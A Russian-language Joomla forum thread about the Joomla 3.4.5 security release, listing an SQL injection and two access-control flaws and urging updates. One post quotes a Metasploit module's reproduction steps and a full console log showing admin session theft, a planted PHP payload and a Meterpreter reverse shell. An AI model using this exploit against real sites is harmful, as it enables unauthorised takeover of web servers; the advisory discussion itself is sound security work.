- Сообщений: 994
- Спасибо получено: 149
И звезды погасли. Фантастика. (04 фев 2025)
Казалось бы, давно уже не торт: банальная идея, всеми корнями в экзистенциализме - привычный нам мир создан объективациями, пересечениями и взаимопроникновениями индивидуальных сознаний.
Joomla 3.4.5. Important Security Announcement
- serge
-
Автор темы
- Не в сети
- Модератор
-
Никакой информации о найденной в ядре Joomla уязвимости команда безопасности (The Joomla security team (JSST)), как обычно, заранее не предоставляет:
Joomla 3.4.5 release containing a security fix will publish Thursday 22nd October at approximately 14:00 UTC .
The Joomla security team (JSST) has been informed of a critical security issue in the Joomla core.
Since this is a very important security fix, please be prepared to update your Joomla installation's next Thursday.
Until the release is out, please understand that we cannot provide any further information.
Официальный анонс о предстоящем релизе безопасности доступен на Joomla.org.
А я смогу! - А поглядим! - А я упрямый!
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
![Dev banner 1](https://masterpro.ws/images/banners/dev_banner/oldman_developer1.jpg)
- Aleksej
-
- Не в сети
- Модератор
-
Доступна к загрузке Joomla! 3.4.5. Это релиз безопасности для Joomla 3.x, настоятельно рекомендуется обновить Joomla немедленно.
Релиз содержит изменения, направленные на исправление найденных уязвимостей. Всего их три, одна из которых - уязвимость высокого уровня опасности. Настоятельно рекомендуем обновиться до Joomla 3.4.5 немедленно. Полный список ошибок доступен, как обычно, в Github.
Описание важных изменений:
- SQL Injection (подвержены версии Joomla начиная с 3.2 до 3.4.4) - уязвимость высокого уровня опасности. Недостаточная фильтрации запроса данных приводит к уязвимости SQL Injection.
- Core - ACL Violations (подвержены версии Joomla начиная с 3.2 до 3.4.4) - уязвимость среднего уровня опасности. Позволяет получить доступ к данным com_content доступ к которым должен быть ограничен.
- Core - ACL Violations (подвержены версии Joomla начиная с 3.0 до 3.4.4) - уязвимость среднего уровня опасности. Позволяет получить доступ к данным com_contenthistory доступ к которым должен быть ограничен.
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
- tekumze
-
- Не в сети
- Захожу иногда
-
- Сообщений: 47
- Спасибо получено: 7
![;) ;)](/media/kunena/emoticons/11.png)
Примечание модератора. Изменил ссылку на видео, руководствуясь данным сообщением .
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
- serge
-
Автор темы
- Не в сети
- Модератор
-
- Сообщений: 994
- Спасибо получено: 149
Add Joomla Content History SQLi RCE exploit module
This module exploits Asaf Orpani@Trustwave's Joomla SQLi in versions 3.2 up to 3.4.4. After gaining Administrator access it will create an extra template file with our payload, which provides a shell.
Steps to reproduce:
Deploy github.com/joomla/joomla-cms/releases/do...ble-Full_Package.zip on a linux VM (tested on Ubuntu 15.04)
Install through the web browser, keep everything default
Login to the administrator portal at http:///administrator
Click on "New Article" -> Title: "Anything" -> Body: "Anything" -> Save (Needed for some actual data in the _ucm_history table)
Make sure that you are still logged in as a Administrator (Super User) when you run the exploit module (As the SQLi will retrieve the admin session)
Run the exploit!
Code:msf > use exploit/unix/webapp/joomla_contenthistory_sqli_rce msf exploit(joomla_contenthistory_sqli_rce) > set RHOST 192.168.2.130 RHOST => 192.168.2.130 msf exploit(joomla_contenthistory_sqli_rce) > exploit [*] Started reverse handler on 192.168.2.50:4444 [*] 192.168.2.130:80 - Retrieved table prefix [ n13xt ] [*] 192.168.2.130:80 - Retrieved admin cookie [ lvhjcpr08827qa2g45l537ct67 ] [*] 192.168.2.130:80 - Retrieved unauthenticated cookie [ 8ec83d68fe7891e981f2e286f15b31d3 ] [*] 192.168.2.130:80 - Successfully authenticated as Administrator [*] 192.168.2.130:80 - Creating file [ b6iu7Dy.php ] [*] 192.168.2.130:80 - Following redirect to [ /administrator/index.php?option=com_templates&view=template&id=503&file=L2I2aXU3RHkucGhw ] [*] 192.168.2.130:80 - Token [ b062c55811a959dd9cd0f209311cecdb ] retrieved [*] 192.168.2.130:80 - Template path [ /templates/beez3/ ] retrieved [*] 192.168.2.130:80 - Insert payload into file [ b6iu7Dy.php ] [*] 192.168.2.130:80 - Payload data inserted into [ b6iu7Dy.php ] [*] 192.168.2.130:80 - Executing payload [*] Sending stage (33068 bytes) to 192.168.2.130 [*] Meterpreter session 1 opened (192.168.2.50:4444 -> 192.168.2.130:46526) at 2015-10-23 16:55:26 +0700 [+] Deleted b6iu7Dy.php meterpreter > getuid Server username: www-data (33)
Источник
А я смогу! - А поглядим! - А я упрямый!
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
- tekumze
-
- Не в сети
- Захожу иногда
-
- Сообщений: 47
- Спасибо получено: 7
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.